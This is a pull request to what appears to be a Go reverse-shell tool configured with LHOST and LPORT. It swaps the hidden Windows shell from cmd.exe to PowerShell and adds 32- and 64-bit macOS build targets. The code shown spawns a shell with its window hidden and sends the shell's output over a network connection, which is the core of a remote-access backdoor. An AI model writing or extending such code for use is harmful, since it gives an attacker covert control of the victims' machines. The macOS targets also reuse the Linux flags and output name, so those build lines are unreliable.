### PR TITLE
cmd 2 psh

### DIFF
--- a/Makefile
+++ b/Makefile
@@ -28,7 +28,10 @@ windows32:
 windows64:
 	GOOS=windows GOARCH=amd64 ${BUILD} ${WIN_LDFLAGS} -o ${OUT_WINDOWS} ${SRC}
 
-macos:
+macos32:
+	GOOS=darwin GOARCH=386 ${BUILD} ${LINUX_LDFLAGS} -o ${OUT_LINUX} ${SRC}
+
+macos64:
 	GOOS=darwin GOARCH=amd64 ${BUILD} ${LINUX_LDFLAGS} -o ${OUT_LINUX} ${SRC}
 
 clean:

--- a/README.md
+++ b/README.md
@@ -47,7 +47,8 @@ However, some helper targets are available in the ``Makefile``:
 - ``windows64`` : builds a windows 64 bits executable (PE 64 bits)
 - ``linux32`` : builds a linux 32 bits executable (ELF 32 bits)
 - ``linux64`` : builds a linux 64 bits executable (ELF 64 bits)
-- ``macos`` : builds a mac os 64 bits executable (Mach-O)
+- ``macos32`` : builds a mac os 32 bits executable (Mach-O)
+- ``macos64`` : builds a mac os 64 bits executable (Mach-O)
 
 For those targets, you just need to set the ``LHOST`` and ``LPORT`` environment variables.
 

--- a/shell/shell_windows.go
+++ b/shell/shell_windows.go
@@ -17,13 +17,13 @@ const (
 )
 
 func GetShell() *exec.Cmd {
-	cmd := exec.Command("C:\\Windows\\System32\\cmd.exe")
+	cmd := exec.Command("C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")
 	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
 	return cmd
 }
 
 func ExecuteCmd(command string, conn net.Conn) {
-	cmd_path := "C:\\Windows\\System32\\cmd.exe"
+	cmd_path := "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
 	cmd := exec.Command(cmd_path, "/c", command+"\n")
 	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
 	cmd.Stdout = conn


### PR DESCRIPTION
cmd_path := "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
instead of
cmd_path := "C:\\Windows\\System32\\cmd.exe"


